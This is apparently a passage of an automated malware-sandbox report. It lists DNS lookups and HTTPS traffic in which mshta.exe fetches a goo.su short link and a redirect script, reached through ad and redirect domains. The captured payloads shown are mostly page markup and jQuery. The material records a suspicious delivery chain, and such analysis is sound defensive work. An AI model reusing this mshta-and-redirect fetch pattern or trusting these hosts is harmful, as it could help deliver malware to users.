                                                                                                                                                                                                Dec 17, 2024 08:43:19.972870111 CET192.168.2.71.1.1.10xf0ceStandard query (0)richinfo.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:20.152931929 CET192.168.2.71.1.1.10x28b5Standard query (0)enduresopens.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:22.957936049 CET192.168.2.71.1.1.10xba89Standard query (0)an.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.124644995 CET192.168.2.71.1.1.10x1eb0Standard query (0)top-fwz1.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.131294012 CET192.168.2.71.1.1.10x2444Standard query (0)counter.yadro.ruA (IP address)IN (0x0001)false

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                Dec 17, 2024 08:43:17.554280996 CET1.1.1.1192.168.2.70x8fd0No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:17.554280996 CET1.1.1.1192.168.2.70x8fd0No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:20.204711914 CET1.1.1.1192.168.2.70xf0ceNo error (0)richinfo.co109.200.199.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:20.204711914 CET1.1.1.1192.168.2.70xf0ceNo error (0)richinfo.co109.200.199.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:20.204711914 CET1.1.1.1192.168.2.70xf0ceNo error (0)richinfo.co5.200.15.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:20.204711914 CET1.1.1.1192.168.2.70xf0ceNo error (0)richinfo.co5.200.15.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:20.596070051 CET1.1.1.1192.168.2.70x28b5No error (0)enduresopens.com23.109.170.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.189045906 CET1.1.1.1192.168.2.70xba89No error (0)an.yandex.ru213.180.204.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.189045906 CET1.1.1.1192.168.2.70xba89No error (0)an.yandex.ru213.180.193.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.189045906 CET1.1.1.1192.168.2.70xba89No error (0)an.yandex.ru93.158.134.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.189045906 CET1.1.1.1192.168.2.70xba89No error (0)an.yandex.ru77.88.21.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.189045906 CET1.1.1.1192.168.2.70xba89No error (0)an.yandex.ru87.250.250.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.362368107 CET1.1.1.1192.168.2.70x1eb0No error (0)top-fwz1.mail.ru95.163.52.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.364840031 CET1.1.1.1192.168.2.70x2444No error (0)counter.yadro.ru88.212.201.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.364840031 CET1.1.1.1192.168.2.70x2444No error (0)counter.yadro.ru88.212.202.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                Dec 17, 2024 08:43:23.364840031 CET1.1.1.1192.168.2.70x2444No error (0)counter.yadro.ru88.212.201.198A (IP address)IN (0x0001)false

                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                • goo.su
                                                                                                                                                                                                • https:
                                                                                                                                                                                                  • richinfo.co
                                                                                                                                                                                                  • enduresopens.com
                                                                                                                                                                                                  • an.yandex.ru
                                                                                                                                                                                                  • counter.yadro.ru
                                                                                                                                                                                                  • top-fwz1.mail.ru

                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.749699172.67.139.1054437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:19 UTC317OUTGET /J3JHqIi HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: goo.su
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:19 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                X-Powered-By: PHP/8.2.13
                                                                                                                                                                                                Cache-Control: private, must-revalidate
                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                expires: -1
                                                                                                                                                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6InU4UGdiMlZJWEpHZFZwOU9RMkNVMGc9PSIsInZhbHVlIjoiM3lSVHE5R09EeVpUSDRtQjlJbkdhOEQwNGVNdFppc2tpRUhpR2lrTTErVCs5aGM0VXFuT2FKc2laZ3ZQcUJpRHljN0VrMzhrYk11Wmw0cW8ydFhRMlc1cHZSY0VXalRMVUdnL1NBQXA1WnQyTE9uQ3FMQXhscWNRSWphUEY1MmMiLCJtYWMiOiIxYjdjZGRjMTI3ODMwOGI0YmNlY2UyOTQ3YzkzZmYwN2RmYTU5YmU0YjJlOThhZmQzNmM4Y2JjNWZmN2M4NDRlIiwidGFnIjoiIn0%3D; expires=Wed, 18 Dec 2024 02:23:19 GMT; Max-Age=67200; path=/; secure; samesite=lax
                                                                                                                                                                                                Set-Cookie: goosu_session=eyJpdiI6IldTby8rRmhyV1NkcXhoaTNjZElXL0E9PSIsInZhbHVlIjoiRWFONmtYNWc4UGZ1SWNDWEcxUStMWEtzd1NKRm1vcTc1V3RqR0JFbVdacVAzbXgxdlhmSS9OWWZVRHFURlFZMjlwWUYxMnpaU2RlMjhyYm1yTFA0MEJDazB3MzRHZnZNeklSMWQ1eWUzdHNlRTh6NENpZm4zcUZ3NEdJNFI4N0siLCJtYWMiOiI1Mzg4YTBiZjk3ZWU0YzRjMzI2ZDE3MzJhZGJiNTYzNTlhNjRmNTQ0ZjY3NGExYTBhNTUxYTlhNTI2NzE0MDUwIiwidGFnIjoiIn0%3D; expires=Wed, 18 Dec 2024 02:23:19 GMT; Max-Age=67200; path=/; httponly; samesite=lax
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                2024-12-17 07:43:19 UTC612INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 78 4f 25 32 42 59 38 6e 61 7a 77 44 33 69 71 70 38 32 58 25 32 46 43 6f 72 46 33 41 66 78 6a 70 6d 73 74 32 6c 55 56 65 50 77 6b 25 32 46 72 4f 47 32 45 49 62 7a 4b 37 65 5a 78 61 33 78 64 79 36 72 44 76 75 35 70 51 33 69 44 6e 54 41 56 52 58 52 66 75 58 6f 69 73 66 66 58 6a 4b 64 71 62 44 59 58 47 7a 79 70 30 72 44 32 37 4d 4d 4a 6e 5a 25 32 46 63 65 72 55 48 38 6b 34 42 66 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xO%2BY8nazwD3iqp82X%2FCorF3Afxjpmst2lUVePwk%2FrOG2EIbzK7eZxa3xdy6rDvu5pQ3iDnTAVRXRfuXoisffXjKdqbDYXGzyp0rD27MMJnZ%2FcerUH8k4Bfg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 35 33 33 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 2f 69 6d 67 2f 66 61 76 69 63 6f
                                                                                                                                                                                                Data Ascii: 5332<!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex"> <link rel="apple-touch-icon" sizes="180x180" href="/img/favico
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 64 2d 6e 6f 6e 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: font-weight: normal; font-size: 28px; line-height: 38px; text-align: center; color: #000000; } .d-none { display: none; }
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 2f 2a 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 70 69 6e 6e 65 72 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 72 6f 74 61 74 69 6f 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 35 73 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: /*text-transform: uppercase;*/ } .spinner img { -webkit-animation-name: rotation; -webkit-animation-duration: 5s; -webkit-animation-iteration-count: infinite;
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 40 2d 6d 6f 7a 2d 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 25 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73
                                                                                                                                                                                                Data Ascii: @-moz-keyframes rotation { 0% {-webkit-transform:rotate(0deg); -moz-transform:rotate(0deg); -o-transform:rotate(0deg); transform:rotate(0deg);} 100% {-webkit-trans
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 33 70 78 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 34 38
                                                                                                                                                                                                Data Ascii: font-family: Roboto; font-style: normal; font-weight: 500; font-size: 20px; line-height: 23px; color: #000000; position: absolute; top: 48
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 69 4d 42 65 4b 55 2f 64 67 41 41 41 41 64 30 53 55 31 46 42 2b 63 4c 45 42 51 32 42 70 73 4d 32 50 67 41 41 41 41 5a 64 45 56 59 64 45 4e 76 62 57 31 6c 62 6e 51 41 51 33 4a 6c 59 58 52 6c 5a 43 42 33 61 58 52 6f 49 45 64 4a 54 56 42 58 67 51 34 58 41 41 41 54 50 30 6c 45 51 56 52 34 32 75 32 64 65 58 68 55 35 62 33 48 50 2b 65 63 6d 63 6c 6b 42 57 4a 43 77 70 49 51 31 67 51 6c 4c 41 71 43 72 4d 4f 69 75 44 43 74 69 4e 70 57 78 62 30 36 55 6e 75 76 33 62 7a 61 32 71 65 32 56 6d 2b 76 65 71 2f 57 58 75 73 55 61 71 2b 56 57 68 64 45 68 65 48 71 46 51 53 47 54 57 51 4c 43 72 49 6c 68 47 78 45 53 41 49 4a 32 5a 6a 4d 54 47 62 4f 2f 57 4f 47 6d 45 41 53 35 70 78 5a 4d 68 50 4f 39 33 6e 6d 65 63 53 63 38 37 37 6e 76 4e 2f 7a 2b 37 32 2f 35 58 31 2f 72 30 41 76
                                                                                                                                                                                                Data Ascii: iMBeKU/dgAAAAd0SU1FB+cLEBQ2BpsM2PgAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAATP0lEQVR42u2deXhU5b3HP+ecmclkBWJCwpIQ1gQlLAqCrMOiuDCtiNpWxb06Unuv3bza2qe2Vm+veq/WXusUaq+VWhdEheHqFQSGTWQLCrIlhGxESAIJ2ZjMTGbO/WOGmEAS5pxZMhPO93nmecSc877nvN/z+72/5X1/r0Av
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 63 56 4f 72 65 73 4c 34 2b 72 71 6d 7a 70 39 4d 4b 35 43 37 4c 6c 42 78 34 79 6b 5a 51 63 48 77 36 53 36 78 6f 62 7a 30 6f 6c 78 36 6f 53 69 77 70 50 53 69 76 65 50 4d 44 5a 4a 6b 2b 6f 32 69 34 44 63 74 6f 62 57 2b 63 54 2f 43 76 67 39 36 48 71 4c 58 39 69 71 72 7a 77 74 76 48 65 63 52 4f 47 53 6e 71 39 4c 71 72 30 6d 64 50 70 62 69 7a 59 66 54 54 35 6e 65 56 37 4b 54 6c 79 59 52 32 56 55 57 4e 53 35 4a 2f 39 63 6a 34 44 42 71 53 47 64 66 2b 57 77 2b 48 30 37 50 69 38 55 46 72 36 79 6b 35 33 55 30 4f 72 50 67 52 4e 7a 72 54 5a 4c 56 76 4f 2f 61 50 44 71 73 72 63 6e 41 56 2f 42 41 59 45 32 30 4e 63 76 4d 69 2f 2f 58 59 6d 64 39 30 37 51 78 36 63 6c 53 5a 4a 55 76 54 74 38 64 62 70 70 4c 69 73 37 48 54 6d 58 70 66 48 6f 42 79 6a 39 2f 43 42 61 71 48 46 38
                                                                                                                                                                                                Data Ascii: cVOresL4+rqmzp9MK5C7LlBx4ykZQcHw6S6xobz0olx6oSiwpPSivePMDZJk+o2i4DctobW+cT/Cvg96HqLX9iqrzwtvHecROGSnq9Lqr0mdPpbizYfTT5neV7KTlyYR2VUWNS5J/9cj4DBqSGdf+Ww+H07Pi8UFr6yk53U0OrPgRNzrTZLVvO/aPDqsrcnAV/BAYE20NcvMi//XYmd907Qx6clSZJUvTt8dbppLis7HTmXpfHoByj9/CBaqHF8
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 6b 57 5a 5a 74 48 2b 31 6f 57 62 4c 34 51 2f 32 47 2f 36 33 55 43 78 45 49 55 64 66 56 75 46 69 35 76 45 68 36 2f 4e 46 56 55 76 48 52 45 36 72 62 47 54 64 68 71 46 63 4f 51 69 6b 33 6e 6e 48 7a 78 71 76 37 68 55 63 66 65 49 63 6a 68 79 74 55 46 79 55 64 6d 61 63 6f 56 54 39 43 42 4b 35 51 63 6b 66 65 75 44 36 6b 70 43 53 6f 30 6a 58 76 2f 6e 4f 7a 64 39 6b 66 76 7a 52 4b 55 75 52 64 35 72 70 54 4c 68 35 37 63 44 55 48 44 35 53 72 73 6f 41 54 45 34 33 69 32 49 6e 42 31 79 67 2f 58 65 58 6b 69 52 39 2f 6f 6a 39 38 71 45 4a 56 6a 6e 44 45 53 45 58 79 6d 43 47 69 4d 43 39 37 65 58 36 47 71 68 63 37 63 72 6a 43 39 64 62 53 77 7a 33 71 4d 77 73 43 2f 4d 66 54 36 77 32 6e 54 35 31 52 56 54 70 77 65 4f 35 6c 49 58 47 50 50 4b 32 79 2b 4f 70 4c 6d 36 58 47 52 6f
                                                                                                                                                                                                Data Ascii: kWZZtH+1oWbL4Q/2G/63UCxEIUdfVuFi5vEh6/NFVUvHRE6rbGTdhqFcOQik3nnHzxqv7hUcfeIcjhytUFyUdmacoVT9CBK5QckfeuD6kpCSo0jXv/nOzd9kfvzRKUuRd5rpTLh57cDUHD5SrsoATE43i2InB1yg/XeXkiR9/oj98qEJVjnDESEXymCGiMC97eX6Gqhc7crjC9dbSwz3qMwsC/MfT6w2nT51RVTpweO5lIXGPPK2y+OpLm6XGRo
                                                                                                                                                                                                2024-12-17 07:43:19 UTC1369INData Raw: 70 35 4a 6a 4a 31 76 4f 6e 47 6b 32 56 6c 66 56 65 31 31 4f 6a 39 6a 31 56 33 74 61 58 72 75 36 72 4b 32 76 79 62 4d 79 2b 4f 56 76 76 6b 75 77 2b 64 55 7a 5a 35 6f 38 4a 63 56 56 55 6e 4f 7a 55 36 36 72 62 52 61 55 61 79 55 38 73 74 79 39 79 39 59 2f 4d 38 56 6c 4d 4f 67 4d 57 64 6c 70 5a 39 50 53 2b 67 52 56 41 72 4b 70 79 63 46 64 4e 79 2f 48 47 37 6a 72 6e 4b 4c 44 74 32 46 4a 45 66 5a 2b 63 55 70 58 58 6c 59 74 5a 77 38 4a 62 70 66 70 30 47 47 5a 78 6b 44 63 74 5a 71 61 65 71 46 39 44 6e 54 48 70 69 70 4f 6e 4b 68 6c 34 4d 44 4c 67 75 71 2f 62 39 38 6b 61 63 4a 56 53 63 45 59 55 6f 46 49 30 7a 6c 4a 44 62 71 2b 5a 38 47 65 59 69 58 6b 31 67 4f 4e 49 6e 42 59 54 57 65 62 4e 68 78 73 6a 5a 52 36 53 30 2f 76 49 38 2b 2f 4f 61 66 44 6d 37 33 2f 7a 73 35
                                                                                                                                                                                                Data Ascii: p5JjJ1vOnGk2VlfVe11Oj9j1V3taXru6rK2vybMy+OVvvkuw+dUzZ5o8JcVVUnOzU66rbRaUayU8sty9y9Y/M8VlMOgMWdlpZ9PS+gRVArKpycFdNy/HG7jrnKLDt2FJEfZ+cUpXXlYtZw8Jbpfp0GGZxkDctZqaeqF9DnTHpipOnKhl4MDLguq/b98kacJVScEYUoFI0zlJDbq+Z8GeYiXk1gONInBYTWebNhxsjZR6S0/vI8+/OafDm73/zs5


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.749703172.67.139.1054437544C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1123OUTGET /frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5 HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Referer: https://goo.su/J3JHqIi
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: goo.su
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Cookie: XSRF-TOKEN=eyJpdiI6InU4UGdiMlZJWEpHZFZwOU9RMkNVMGc9PSIsInZhbHVlIjoiM3lSVHE5R09EeVpUSDRtQjlJbkdhOEQwNGVNdFppc2tpRUhpR2lrTTErVCs5aGM0VXFuT2FKc2laZ3ZQcUJpRHljN0VrMzhrYk11Wmw0cW8ydFhRMlc1cHZSY0VXalRMVUdnL1NBQXA1WnQyTE9uQ3FMQXhscWNRSWphUEY1MmMiLCJtYWMiOiIxYjdjZGRjMTI3ODMwOGI0YmNlY2UyOTQ3YzkzZmYwN2RmYTU5YmU0YjJlOThhZmQzNmM4Y2JjNWZmN2M4NDRlIiwidGFnIjoiIn0%3D; goosu_session=eyJpdiI6IldTby8rRmhyV1NkcXhoaTNjZElXL0E9PSIsInZhbHVlIjoiRWFONmtYNWc4UGZ1SWNDWEcxUStMWEtzd1NKRm1vcTc1V3RqR0JFbVdacVAzbXgxdlhmSS9OWWZVRHFURlFZMjlwWUYxMnpaU2RlMjhyYm1yTFA0MEJDazB3MzRHZnZNeklSMWQ1eWUzdHNlRTh6NENpZm4zcUZ3NEdJNFI4N0siLCJtYWMiOiI1Mzg4YTBiZjk3ZWU0YzRjMzI2ZDE3MzJhZGJiNTYzNTlhNjRmNTQ0ZjY3NGExYTBhNTUxYTlhNTI2NzE0MDUwIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                2024-12-17 07:43:21 UTC935INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Tue, 17 Dec 2024 07:43:21 GMT
                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                Content-Length: 87787
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Last-Modified: Mon, 25 Dec 2023 12:00:02 GMT
                                                                                                                                                                                                ETag: "65896ec2-156eb"
                                                                                                                                                                                                Expires: Fri, 20 Dec 2024 09:56:48 GMT
                                                                                                                                                                                                Cache-Control: max-age=604800
                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                Age: 337593
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oTgUxtLcqFd5hSsonAArEtBvgGqmnGZ6DXeW3Ci3o4Z4y3GRqNxvPzg3dmpONE%2Fz26ABB04szhit1M4awu1CePXNAKE8YytWw8FDtaScStM1F7AfCDyUxXE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8f3548205b5342fc-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4359&min_rtt=1583&rtt_var=6146&sent=4&recv=7&lost=0&retrans=0&sent_bytes=139&recv_bytes=1667&delivery_rate=61360&cwnd=186&unsent_bytes=0&cid=ff6540fdf330798d&ts=450&x=0"
                                                                                                                                                                                                2024-12-17 07:43:21 UTC434INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 72 65 64 69 72 65 63 74 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 39 37 35 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 65 78 70 6f 72 74 73 3f 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 6e 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f
                                                                                                                                                                                                Data Ascii: /*! For license information please see redirect.js.LICENSE.txt */(()=>{var e={9755:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires a windo
                                                                                                                                                                                                2024-12-17 07:43:21 UTC1369INData Raw: 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 6c 3d 6f 2e 70 75 73 68 2c 63 3d 6f 2e 69 6e 64 65 78 4f 66 2c 66 3d 7b 7d 2c 70 3d 66 2e 74 6f 53 74 72 69 6e 67 2c 64 3d 66 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 68 3d 64 2e 74 6f 53 74 72 69 6e 67 2c 67 3d 68 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 76 3d 7b 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 2e 69 74 65 6d 7d 2c 6d 3d 66 75 6e 63 74 69 6f
